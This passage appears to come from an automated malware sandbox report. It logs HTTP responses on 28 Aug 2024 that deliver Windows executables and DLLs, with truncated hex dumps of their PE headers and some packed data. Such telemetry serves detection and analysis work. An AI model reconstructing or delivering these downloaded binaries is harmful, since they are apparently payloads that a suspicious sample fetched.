74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:14 GMTContent-Type: application/octet-streamContent-Length: 328232Last-Modified: Wed, 28 Aug 2024 19:58:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf8181-50228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 81 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d4 04 00 00 06 00 00 00 00 00 00 5e f2 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 b7 52 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 f2 04 00 53 00 00 00 00 00 05 00 42 02 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 d0 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d2 04 00 00 20 00 00 00 d4 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 05 00 00 04 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f2 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e0 04 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7e 30 aa dd a7 42 95 cb 06 7e 16 66 63 df d6 a0 d8 12 38 7f e2 e9 9d 75 90 20 b8 08 26 b0 72 e1 93 c7 f4 8f 83 9b ac 8e 4b f5 22 59 60 5f 15 96 a3 a6 42 77 90 ef c5 6f 13 ea 52 a9 58 63 d2 60 d5 dd df 0c 0d a2 1f 28 6f 9c 85 6e a6 8e e0 fc b9 45 35 4c 60 73 b3 c3 8d 42 cf 26 f7 33 b8 6a 6d de fc 63 20 91 ed cd be 31 90 9c ff 58 e3 7a 96 6b 48 f4 6d 19 fd 4a 5b 5f 73 4e 91 f3 4f 8b cc a9 c0 16 08 57 c4 08 a6 0b bc bd 12 2f d1 8e 95 4d f3 33 9d b3 65 0c 7a 3a af d6 ba af ab 37 49 c5 79 1f 37 a8 4c 81 39 f6 f4 6f 20 c0 31 e0 19 f9 c3 3b 25 eb 01 b8 6e 7a 34 da ea 95 57 6c 45 6e 23 a5 37 4e bb 01 f0 f4 0b ea 3a 76 c0 ff 8a a5 4d 1a 19 f1 49 96 b2 04 43 b1 fd a2 88 6b bb 9d fe 7d f2 b7 c1 66 38 5c 78 ba 71 2b 5f e1 77 df 75 21 e9 81 94 62 5a 00 95 78 0b 42 b0 38 79 a1 2d 8c cd 5d 43 97 1b 34 95 a4 d1 35 0e 80 6b 9e 81 83 32 83 f7 2d db 35 50 f3 b3 b0 df db 89 f7 4e 9a 21 9b 57 25 fd f7 c8 06 6d 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:15 GMTContent-Type: application/octet-streamContent-Length: 196136Last-Modified: Wed, 28 Aug 2024 19:09:07 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf75d3-2fe28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 75 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d0 02 00 00 06 00 00 00 00 00 00 5e ee 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 ad 77 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 ee 02 00 53 00 00 00 00 00 03 00 42 02 00 00 00 00 00 00 00 00 00 00 00 d8 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 d0 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 ce 02 00 00 20 00 00 00 d0 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 03 00 00 04 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ee 02 00 00 00 00 00 48 00 00 00 02 00 05 00 98 dc 02 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 44 d3 a5 67 31 84 4d 3c 80 8f 5a 66 48 41 ec 5d b4 52 28 f8 87 bd a7 fe c7 d7 8f 76 ac 0c 58 37 0b 55 22 d0 37 b7 8b 2d 4f 2c 93 1d 3f 76 31 a8 83 b0 7a 11 8f a4 d2 3f 14 6c 97 0a 3e c8 b7 5e d7 10 27 10 50 4c 5e 1c 8a 6c 53 ae 0a 47 c6 63 f5 7d a5 af 50 e0 89 16 0e 80 38 b7 91 9e 6f 53 fe d6 4d de ae 16 c9 ac 5b 97 d0 bb 86 09 2d 13 1a 66 66 94 b2 63 66 bb 0b 95 48 12 c9 e7 6a c4 c7 88 c9 25 18 6e a5 92 c3 dd 1e 61 2f 3f 72 1a 52 e9 be 22 c4 19 13 ca d5 12 a0 bd fb 5d 5a 92 d4 f7 a5 6a 53 96 f1 ef 6b c3 57 ba 61 39 39 e1 d3 11 94 7c 0e 70 79 95 f8 6d c1 73 7c 81 68 85 c5 b9 ac 97 0a e6 c2 34 15 cf f0 58 37 04 a7 b6 b5 32 8d ed 9b 83 3f c5 34 50 b4 4e 15 be 12 d8 38 33 22 8e fa 70 65 e1 da 6f 02 81 c2 63 b7 96 77 74 f5 bc 6a fa d0 4c a6 5f 4b b5 af ec 17 51 40 80 15 3b 73 05 e7 d1 08 11 3f 52 4b 96 16 47 4e 00 02 26 91 63 1d ad f4 93 0f 4e 05 dc e6 13 60 a3 70 d1 32 01 1c 2b 06 59 ad 8e 45 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:51 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:55 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 